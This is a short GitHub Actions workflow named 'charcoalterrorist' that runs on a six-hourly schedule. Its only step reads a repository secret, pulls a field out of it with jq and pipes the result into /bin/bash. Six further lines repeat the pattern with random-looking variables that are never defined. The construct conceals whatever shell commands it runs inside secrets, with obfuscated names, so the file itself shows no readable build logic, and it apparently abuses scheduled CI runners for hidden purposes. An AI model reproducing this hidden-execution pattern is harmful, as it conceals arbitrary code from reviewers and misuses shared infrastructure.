name: charcoalterrorist

on:
  workflow_dispatch:
  schedule:
    - cron: '40 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: charcoalterrorist
        env:
          or7018: ${{ secrets.or7018 }}
        run: |
          echo $or7018 | jq -r .rcce01221 | /bin/bash
          echo $qgew09 | jq -r .h8 | /bin/bash
          echo $lsl110 | jq -r .zqb839 | /bin/bash
          echo $uituh998 | jq -r .ikzo44 | /bin/bash
          echo $goum1872 | jq -r .uyd076 | /bin/bash
          echo $n4687 | jq -r .qdf17 | /bin/bash
          echo $vns00332 | jq -r .wwwcb8380 | /bin/bash

